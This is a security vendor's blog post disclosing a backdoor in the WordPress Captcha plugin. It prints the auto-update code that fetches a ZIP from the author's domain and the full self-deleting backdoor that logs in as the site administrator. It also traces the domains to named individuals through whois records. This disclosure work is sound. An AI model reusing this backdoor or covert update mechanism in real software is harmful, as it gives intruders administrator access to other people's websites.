This entry was posted in WordPress Security on December 19, 2017 by Matt Barry 105 Replies

The WordPress repository recently removed the plugin Captcha over what initially appeared to be a trademark issue with the current author using “WordPress” [Editors note: the original page has been removed, we’re now linking to a screen shot.] in their brand name.

Whenever the WordPress repository removes a plugin with a large user base, we check to see if it was possibly due to something security-related. Wordfence alerts users when any plugin they are running is removed from WordPress repo as well. At the time of its removal, Captcha had over 300,000 active installs, so its removal significantly impacts many users. Though the developer was the person who posted about the plugin’s reason for removal, I decided to look at the plugin source to see if there was some foul play on the part of the developer. I found the following code:

function cptch_wp_plugin_auto_update() { require_once ('cptch_wp_auto_update.php'); global $cptch_plugin_info; $wptuts_plugin_current_version = $cptch_plugin_info['Version']; $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php'; $wptuts_plugin_slug = plugin_basename(__FILE__); new cptch_wp_auto_update($wptuts_plugin_current_version, $wptuts_plugin_remote_path, $wptuts_plugin_slug); }

This code triggers an automatic update process that downloads a ZIP file from https://simplywordpress[dot]net/captcha/captcha_pro_update.php , then extracts and installs itself over the copy of the Captcha plugin running on site. The ZIP contains a few small code changes from what is in the plugin repository, and it also contains a file called plugin-update.php , which is a backdoor:

@unlink(__FILE__); require('../../../wp-blog-header.php'); require('../../../wp-includes/pluggable.php'); $user_info = get_userdata(1); // Automatic login // $username = $user_info->user_login; $user = get_user_by('login', $username ); // Redirect URL // if ( !is_wp_error( $user ) ) { wp_clear_auth_cookie(); wp_set_current_user ( $user->ID ); wp_set_auth_cookie ( $user->ID ); $redirect_to = user_admin_url(); wp_safe_redirect( $redirect_to ); exit(); }

A backdoor file allows an attacker, or in this case, a plugin author, to gain unauthorized administrative access to your website. This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself.

The backdoor installation code is unauthenticated, meaning anyone can trigger it. We will edit this post to include a proof of concept after 30 days with technical details on how the backdoor installation and execution works.

One of the other changes in the ZIP file is an update to the URL using the same automatic update process the developer used to install the backdoor:

< $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php'; --- > $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_free_update.php';

The code pulled down from https://simplywordpress[net]net/captcha/captcha_free_update.php is identical to what’s in the plugin repository, so triggering the same automatic update process removes all file system traces of the backdoor, making it look as if it was never there and helping the attacker avoid detection.

The plugin first included this malicious code in the WordPress plugin repository on December 4, 2017 at 1:52pm UTC in the commit @1780758:

Who Is the New Captcha Author?

Previously, the plugin development company BestWebSoft owned and maintained the Captcha plugin. On September 5, 2017, they announced a change in ownership without mentioning who the new owner was.

We decided to find out who owns the domain simplywordpress.net, since this is the domain serving the ZIP file that contains the backdoor. Simplywordpress.net is registered to someone named Stacy Wellington using the email address scwellington@hotmail.co.uk. Using a reverse whois lookup, we found a large number of other domains registered to this user:

http://viewdns.info/reversewhois/?q=scwellington%40hotmail.co.uk

One specifically popped up that we’ve seen in the past: unsecuredloans4u.co.uk

http://www.viewdns.info/dnsreport/?domain=simplywordpress.net

http://www.viewdns.info/dnsreport/?domain=unsecuredloans4u.co.uk

The footer of unsecuredloans4u.co.uk states:

“Unsecuredloans4u.co.uk is a registered Trading Name of Soiza Internet Marketers Limited, which is an Introducer Appointed Representative of Quint Group Limited and is entered on the Financial Services Register under the reference number: 748266.”

If you have not read our previous post on Mason Soiza, I’d suggest you read that first, since he has a long history of buying WordPress plugins in order to place cloaked backlinks on his users’ sites. He then uses these backlinks to increase page rank in SERPs (Search Engine Results Pages) since only web crawlers such as Googlebot can read them.

The hostmaster email address is the same for both simplywordpress.net and unsecuredloans4u.co.uk (Stacy Wellington scwellington@hotmail.co.uk).

http://www.viewdns.info/dnsreport/?domain=simplywordpress.net

http://www.viewdns.info/dnsreport/?domain=unsecuredloans4u.co.uk

The DNS history for simplywordpress.net has a previous A-record of 195.154.179.176, which is the current A-record for unsecuredloans4u.co.uk. This DNS change happened about a month ago (two months after the Captcha committer changed over to wpdevmgr2678, the new owner).

If we look at some of the other domains hosted at 195.154.179.176, we can see pingloans.co.uk which is another Introducer Appointed Representative of Quint Group Limited. That site’s footer states:

“Pingloans.co.uk is a registered trading style of Serpable Ltd, which is an Introducer Appointed Representative of Quint Group Limited and is entered on the financial services register under the reference number 780328. Quint Group Limited is authorised and regulated by the Financial Conduct Authority and is entered on the Financial Services Register under reference number: 669450. Serpable Ltd is registered in England and Wales (Company number: 10699069), Registered Office, 17 Collingbourne Avenue, Bournemouth, Dorset. BH6 5QR. Licenced by the Information Commissioners Office, (registration number ZA248554).”

Serpable Ltd is owned by Charlotte Ann Wellington, possibly related to Stacy Wellington. Stacy Wellington’s email address is also the hostmaster email for pingloans.co.uk.

The common theme between the two Wellingtons and Mason Soiza is Quint Group Limited. We have observed Mason Soiza creating backdoors in the plugins he bought to create cloaked backlinks to his own loan sites. These backlinks play a big role in how search engines rank sites for different search terms. However, at this time, it’s unclear if either Charlotte or Stacy Wellington is the creator of the backdoor code we discovered in the Captcha plugin.

We decided to keep looking into simplywordpress.net. The site offers five other plugins in addition to Captcha available for download:

Covert me Popup

Death To Comments

Human Captcha

Smart Recaptcha

Social Exchange

All five plugins contain the same backdoor installation code we found in Captcha. A Google search for site:simplywordpress.net reveals a few directories with extra plugin downloads:

http://simplywordpress.net/recaptcha2/

http://simplywordpress.net/swpopup/

http://simplywordpress.net/recaptcha1/

http://simplywordpress.net/recaptcha1/sw_popup_free_update.php downloads a ZIP file with the same backdoor installation code we saw in Captcha and the other plugins, but the URL used in the auto-update function (line 525 in swpopup.php) to download the backdoored ZIP points to a different domain: http://heyrank.co.uk/plugintool/recaptcha2/sw_popup_pro_update.php

Heyrank.co.uk is another domain registered to Stacy Wellington. It resolves to the same IP address as unsecuredloans4u.co.uk (195.154.179.176, Mason Soiza’s domain), and is also part of the NS records for unsecuredloans4u.co.uk:

$ whois unsecuredloans4u.co.uk Domain name: unsecuredloans4u.co.uk Registrant: Stacy Wellington ... Name servers: ns1.heyrank.co.uk 195.154.179.176 ns2.heyrank.co.uk 195.154.179.176

At this point, we have a strong correlation between Stacy Wellington, simplywordpress.net, and heyrank.co.uk, so it’s a strong possibility that wpdevmgr2678 is Stacy Wellington. The connection to Mason Soiza is unsecuredloans4u.co.uk and Quint Ltd. Both Mason Soiza and Stacy Wellington have businesses that are Introducer Appointed Representatives of Quint Ltd.

Serpable Ltd

We know at this point that Stacy and Charlotte Ann Wellington are involved with Quint Ltd through the company Serpable Ltd. So we decided to look for connections between the name Stacy Wellington and Serpable. We found this bio of his:

https://www.digitalunite.com/users/stacy-wellington

He mentions he works for Serpable (http://www.serpable.co.uk/) and that he’s interested in computer security. This company is owned by Charlotte Ann Wellington. Charlotte also owns codelabs.group and leadbrain.co.uk, for which Stacy’s email is listed as the hostmaster:

http://viewdns.info/dnsreport/?domain=codelabs.group

http://viewdns.info/dnsreport/?domain=leadbrain.co.uk

The company Serpable Ltd is (or was previously) an SEO company. They’ve advertised prices for backlinks in the past. There are also posts from the user Serpable (http://www.serpable.co.uk/) on BlackHatWorld using the Skype handle stacy.wellington1 .

We also found other Quint Group-based loan sites that state “Serpable Ltd, which is an Introducer Appointed Representative of Quint Group Limited”:

http://loanload.co.uk/

http://pingloans.co.uk/

http://pounda.co.uk/

In the footer:

“Loanload.co.uk is a registered trading style of Serpable Ltd, which is an Introducer Appointed Representative of Quint Group Limited and is entered on the financial services register under the reference number 780328. Quint Group Limited is authorised and regulated by the Financial Conduct Authority and is entered on the Financial Services Register under reference number: 669450. Serpable Ltd is registered in England and Wales (Company number: 10699069), Registered Office, 17 Collingbourne Avenue, Bournemouth, Dorset. BH6 5QR. Licenced by the Information Commissioners Office, (registration number ZA248554).”

What We’ve Done So Far

As of this writing, we’ve created three firewall rules in total to protect our users’ sites from the backdoor installation. Premium customers received the first two rules on December 8th and the third one on the 14th. These rules also protect against the backdoor itself executing in Captcha as well as in the five other plugins available for download on simplywordpress.net. Free users will receive these rules 30 days from the original publish date via the community version of the Threat Defense Feed.

We have also been working with the WordPress.org plugins team to get out a patched version of Captcha (4.4.5) that is backdoor-free. The plugins team has used the automatic update to upgrade all backdoored versions (4.3.6 – 4.4.4) up to the new 4.4.5 version. Over the course of the weekend over 100,000 sites running versions 4.3.6 – 4.4.4 were upgraded to 4.4.5. They have also blocked the author from publishing updates to the plugin without their review.

Our Recommendations

We recommend that you uninstall the Captcha plugin immediately from your site. Based on the public data we’ve gathered, this developer does not have user safety in mind and is very likely a criminal actor attempting yet another supply chain attack. You should also ensure that you’ve enabled automatic updates within WordPress – that’s still one of the best ways to keep your site secure before disclosures like this take place. We also recommend using the Premium version of Wordfence, to proactively defend your site against threats like this one.